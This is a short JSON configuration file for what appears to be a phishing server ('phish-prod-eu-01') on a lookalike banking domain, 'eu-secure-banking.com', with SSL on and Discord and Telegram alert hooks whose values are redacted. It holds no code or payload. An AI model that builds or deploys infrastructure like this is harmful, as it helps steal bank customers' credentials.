{
  "server": "phish-prod-eu-01",
  "domain": "eu-secure-banking.com",
  "ssl": true,
  "alerts": {
    "discord_webhook": "REDACTED",
    "telegram_bot": "REDACTED"
  },
  "team_channel": "REDACTED"
}